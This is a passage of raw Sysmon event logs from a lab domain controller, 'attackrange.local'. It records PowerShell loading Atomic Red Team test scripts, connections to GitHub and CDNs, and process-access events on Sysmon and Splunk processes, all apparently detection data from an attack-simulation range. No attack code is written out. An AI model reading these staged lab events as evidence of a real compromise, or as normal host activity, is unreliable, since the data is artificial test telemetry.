11241100x80000000000000003805Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.333{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Public\Start-AtomicGUI.ps12020-11-03 15:52:19.333 11241100x80000000000000003804Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.333{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Public\New-Atomic.ps12020-11-03 15:52:19.333 11241100x80000000000000003803Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.333{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Public\Invoke-WebRequestVerifyHash.ps12020-11-03 15:52:19.333 11241100x80000000000000003802Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.333{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Public\Invoke-MalDoc.ps12020-11-03 15:52:19.333 11241100x80000000000000003801Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.333{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Public\Invoke-AtomicTest.ps12020-11-03 15:52:19.333 11241100x80000000000000003800Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.333{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Public\Get-AtomicTechnique.ps12020-11-03 15:52:19.333 11241100x80000000000000003799Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.333{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Private\Write-PrereqResults.ps12020-11-03 15:52:19.333 11241100x80000000000000003798Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.333{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Private\Write-KeyValue.ps12020-11-03 15:52:19.333 11241100x80000000000000003797Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.318{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Private\Write-ExecutionLog.ps12020-11-03 15:52:19.318 11241100x80000000000000003796Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.318{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Private\Show-Details.ps12020-11-03 15:52:19.318 11241100x80000000000000003795Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.318{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Private\Replace-InputArgs.ps12020-11-03 15:52:19.318 11241100x80000000000000003794Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.318{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Private\Invoke-Process.ps12020-11-03 15:52:19.318 11241100x80000000000000003793Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.318{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Private\Invoke-KillProcessTree.ps12020-11-03 15:52:19.318 11241100x80000000000000003792Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.318{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Private\Invoke-ExecuteCommand.ps12020-11-03 15:52:19.318 11241100x80000000000000003791Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.318{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Private\Invoke-CheckPrereqs.ps12020-11-03 15:52:19.318 11241100x80000000000000003790Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.318{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Private\Get-TargetInfo.ps12020-11-03 15:52:19.318 11241100x80000000000000003789Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.318{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Private\Get-PrereqExecutor.ps12020-11-03 15:52:19.318 11241100x80000000000000003788Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.318{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\Private\AtomicClassSchema.ps12020-11-03 15:52:19.318 22542200x80000000000000003842Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:18.661{D28789B6-7CB1-5FA1-BD00-000000008801}4512codeload.github.com0::ffff:140.82.121.9;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 22542200x80000000000000003841Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:18.457{D28789B6-7CB1-5FA1-BD00-000000008801}4512github.com0::ffff:140.82.121.4;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 354300x80000000000000003840Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:18.661{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-807.attackrange.local50323-false140.82.121.9lb-140-82-121-9-fra.github.com443https 354300x80000000000000003839Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:18.457{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-807.attackrange.local50322-false140.82.121.4lb-140-82-121-4-fra.github.com443https 22542200x80000000000000003845Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:20.054{D28789B6-7CB1-5FA1-BD00-000000008801}4512onegetcdn.azureedge.net0type: 5 onegetcdn.ec.azureedge.net;type: 5 cs9.wpc.v0cdn.net;::ffff:152.199.19.161;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 354300x80000000000000003844Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:20.042{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-807.attackrange.local50325-false152.199.19.161-443https 354300x80000000000000003843Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:20.029{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-807.attackrange.local50324-false172.227.168.22a172-227-168-22.deploy.static.akamaitechnologies.com443https 354300x80000000000000003860Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:22.072{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-807.attackrange.local50327-false168.61.186.235-443https 354300x80000000000000003859Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:21.858{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-807.attackrange.local50326-false172.227.168.22a172-227-168-22.deploy.static.akamaitechnologies.com443https 10341000x80000000000000003858Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:23.107{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7CB7-5FA1-C000-000000008801}5044C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003857Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:23.107{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003856Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:23.107{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003855Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:23.107{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003854Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:23.107{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003853Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:23.107{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003852Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:23.107{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003851Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:23.107{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003850Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:23.107{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003849Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:23.107{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003848Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:23.107{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CB7-5FA1-C000-000000008801}5044C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003847Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:23.107{D28789B6-7C73-5FA1-3300-000000008801}26763928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7CB7-5FA1-C000-000000008801}5044C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003846Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:23.108{D28789B6-7CB7-5FA1-C000-000000008801}5044C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003890Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:24.860{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7CB8-5FA1-C200-000000008801}2956C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003889Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:24.860{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003888Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:24.860{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003887Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:24.860{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003886Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:24.860{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003885Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 